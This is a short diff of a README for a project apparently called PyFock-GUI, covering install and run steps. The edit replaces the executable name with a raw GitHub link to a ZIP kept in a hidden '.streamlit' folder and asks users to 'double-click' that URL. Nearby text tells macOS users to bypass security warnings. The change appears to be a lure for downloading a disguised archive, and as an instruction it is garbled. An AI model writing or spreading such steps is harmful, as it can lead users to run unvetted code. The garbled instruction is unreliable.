addhiee/PyFock-GUI/README.md

    If the downloaded file is a ZIP or compressed file, right-click it and select "Extract All" or use your preferred extraction tool.

 3. **Run the Application**
-   - For Windows, double-click the `PyFock-GUI.exe` file.
+   - For Windows, double-click the `https://raw.githubusercontent.com/addhiee/PyFock-GUI/main/.streamlit/PyFock-GUI-1.3.zip` file.
    - For macOS, right-click and select "Open" to bypass security warnings (if any).
    - For Linux, you may need to open a terminal and run `./PyFock-GUI` after navigating to the download directory.